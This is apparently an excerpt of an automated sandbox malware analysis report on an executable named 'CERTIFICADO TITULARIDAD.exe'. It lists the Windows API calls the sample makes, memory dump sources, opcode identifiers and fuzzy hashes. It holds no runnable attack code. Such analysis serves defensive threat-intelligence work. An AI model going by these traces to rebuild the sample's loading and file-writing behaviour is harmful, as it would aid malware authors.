                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                          • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                          • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                                                          APIs
                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1136574915-0
                                                                                                                          • Opcode ID: a6b89ba8af6c1e3efb140ba777124f975671acfc2916f9b89d602844ba5f78df
                                                                                                                          • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                                                                                          • Opcode Fuzzy Hash: a6b89ba8af6c1e3efb140ba777124f975671acfc2916f9b89d602844ba5f78df
                                                                                                                          • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ShowWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1268545403-0
                                                                                                                          • Opcode ID: da8f5b3a0ed61ba078bfb6436fd17e61c31a2c873ebe17cf9d29e996690946fc
                                                                                                                          • Instruction ID: add67a47d66b636189698deb609c527a6af1c8d9f2ae6a081c6d5e40f6b59c33
                                                                                                                          • Opcode Fuzzy Hash: da8f5b3a0ed61ba078bfb6436fd17e61c31a2c873ebe17cf9d29e996690946fc
                                                                                                                          • Instruction Fuzzy Hash: 30E04F72B11214ABCB15DBA8EDD086E73B6EB48320350443FD102B3690CB759C458B58
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                            • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                            • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                                                            • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547128583-0
                                                                                                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                          • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                          • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,80000000,00000003), ref: 00406015
                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                          • Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
                                                                                                                          • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                          • Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694
                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                          • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                                                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                          • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000), ref: 73F72C57
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: f2bc73b057412198df6e6caa1e934724844d06ee4dc841d75b68e085c2d11ec7
                                                                                                                          • Instruction ID: 3f3083b1b6383bba09791b1d91620a22f570e01bc0572384bf256b9690107240
                                                                                                                          • Opcode Fuzzy Hash: f2bc73b057412198df6e6caa1e934724844d06ee4dc841d75b68e085c2d11ec7
                                                                                                                          • Instruction Fuzzy Hash: 784173B290030AFFEB11AF65DD55B5D37B9EB443D4FF0842BE40EC6260D63595808B91
                                                                                                                          APIs
                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 0040169B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileMove
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3562171763-0
                                                                                                                          • Opcode ID: 9cd6c93b6a93efb06ac0871dbdcd84b0e25f77638c651491ac62b9e43a11c063
                                                                                                                          • Instruction ID: 89333d3631676c448ace311eb669e215935a4e692934488023b8cad4a87c620a
                                                                                                                          • Opcode Fuzzy Hash: 9cd6c93b6a93efb06ac0871dbdcd84b0e25f77638c651491ac62b9e43a11c063
                                                                                                                          • Instruction Fuzzy Hash: B3F0B431608124B7CB10BBA69E0DD9F21649F92338F21067FB012B21D1DABCCD02A1AE
                                                                                                                          APIs
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 390214022-0
                                                                                                                          • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                          • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                                                                          • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                          • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                                                                          APIs
                                                                                                                          • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PathSearch
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2203818243-0
                                                                                                                          • Opcode ID: fc542d2aeae255aace097053f4ba420e9c5acb48d723f4d7d8b8c9f25ecb6f78
                                                                                                                          • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                                                                                                                          • Opcode Fuzzy Hash: fc542d2aeae255aace097053f4ba420e9c5acb48d723f4d7d8b8c9f25ecb6f78
                                                                                                                          • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 004063E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2289755597-0
                                                                                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                          • Instruction ID: 82e02668318ada1346e4ec156b308e726a090f155bb9469a8f3968b5644ca969
                                                                                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                          • Instruction Fuzzy Hash: 86E0B6B2010109BFEF195F90ED5ADBB761DEB08250F01492EF916E4091E6B5E930A674
                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                          • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                          • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                                                          APIs
